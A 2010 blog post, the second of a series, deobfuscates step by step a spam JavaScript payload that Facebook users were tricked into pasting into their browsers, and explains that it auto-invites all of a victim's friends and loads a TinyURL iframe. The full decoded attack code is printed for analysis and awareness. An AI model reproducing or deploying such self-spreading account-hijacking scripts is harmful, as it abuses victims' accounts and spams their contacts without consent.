+++
title = "Deconstructing Facebook spam, Part 2"
published = 2010-07-10T20:13:00.004000-04:00
tags = ["Spam", "Facebook"]
+++

*This is Part 2 of my look into some Facebook spam. First post is
[here]({{< ref "2010-07-10-deconstructing-facebook-spam" >}}).*

Decyphering the code
--------------------

I was bored, so I tried to decipher the code. What is this
`\x69\x6E\x6E\x65...` stuff? Well, that's easy. It's the
[hexadecimal](https://en.wikipedia.org/wiki/Hexadecimal) representation of the
[ASCII code](https://en.wikipedia.org/wiki/ASCII) for some letters/symbols.
Decoding that isn't too difficult. Placing the JS function "alert();" around
the text will pop up the text as the browser sees it (once it's decoded the hex
into the actual letters.) Don't try it if you don't know how to quote it
properly, though. We end up with something like this:

{{< highlight "javascript" >}}
var _0x4168=["innerHTML","app104746576239621_body","getElementById",...];
var variables=[_0x4168[0],_0x4168[1], ...];
void (document[variables[2]](variables[1])[variables[0]]=variables[3]);
...
{{< /highlight >}}

So there's the variable `_0x4168` that contains an array of strings. The next
variable `variables` is also an array of strings taken from the first. In fact,
it's probably redundant. I guess it's to make it more obfuscated. Then there's
some real code that references `variables`.

So let's replace all those `variables` references with the actual values, and
we get something like this.

{{< highlight "javascript" >}}
void
(document["getElementById"]("app104746576239621_body")["innerHTML"]="<a
id=\"suggest\" href=\"#\"
ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&node_id=137354336277359\"
class=\" profile_action actionspro_a\"
rel=\"dialog-post\">Suggest to Friends</a>");
var ss=document["getElementById"]("suggest");
var c=document["createEvent"]("MouseEvents");
...
{{< /highlight >}}

OK, so one last strange thing. What's with this `["text"]` stuff? It turns out
JS has this funky alternative to accessing class members. You can do it the
normal way (`object.member`) or you can treat the object as a dictionary with
the key being a string of the name of the member (`object["member"]`). So
here's how the code finally ends up. I left out some other extras like the
voids and provided some indenting.

{{< highlight "javascript" >}}
document.getElementById("app104746576239621_body").innerHTML=
    "<a id=\"suggest\" href=\"#\"
        ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&node_id=137354336277359\"
        class=\" profile_action actionspro_a\"
        rel=\"dialog-post\">Suggest to Friends</a>";
var ss=document.getElementById("suggest");
var c=document.createEvent("MouseEvents");
c.initEvent("click",true,true);
ss.dispatchEvent(c);
setTimeout(function (){
    fs.select_all();
}, 4000);
setTimeout(function (){
    SocialGraphManager.submitDialog("sgm_invite_form",
        "/ajax/social_graph/invite_dialog.php");
}, 5000);
document.getElementById("app104746576239621_body").innerHTML=
    "<iframe src=\"http://tinyurl.com/253qebf\"
        style=\"width: 800px; height: 600px;\"
        frameborder=0 scrolling=\"no\"></iframe>";
{{< /highlight >}}

So what does it do?
-------------------

We can go through this by each line (or something like a line):

1. Look for a certain element on the page, and replace its "inner" HTML with a
   link called "Suggest to Friends!" with an ID of "suggest".
2. Get the element with the ID of "suggest".
3. Create a mouse event object.
4. Initialize that event object for a click.
5. Dispatch the event. This simulates a click on the previously created link.
6. Call an anonymous function after 4 seconds. This function calls
   `fs.select_all()`
7. Call another anonymous function after 5 seconds. This function calls
   `SocialGraphManager.submitDialog`.
8. Look for a specific element on the page, and replace it with an iframe of a
   tinyurl.

So what does it *really* do?
----------------------------

It should make some sense now. As expected, it's a spammer. The first five
steps basically load the "Suggest to Friends" page. It's a bit overly complex,
but it gets you there (could have just set `document.location` to the URI).
After four seconds, all your friends are selected, and one second later, the
page is submitted, sending the suggestion to all your friends. Finally, it
loads an iframe to replace the body section. The TinyURL is gone now, but it
was a fake picture of Facebook, with a link that was the so-called second step.

In fact, that second link does go to a marginally legitimate page. It's a
[Greasemonkey](https://www.greasespot.net/) script that periodically checks
your friends list and tells you when someone disappears. Now, if you think
about it, that really doesn't tell you if someone's blocked you. It tells you
if someone removed you from their list. It tells you if someone closed their
Facebook account. But it **doesn't** say anything about being blocked.

The interesting thing is how it gets you. You don't click a weird link, or
anything. The user actually has to enter the JS themselves. Now sure, they
don't *know* that, but it's still all them. That's all the more reason to get
people a bit more educated when using computers.
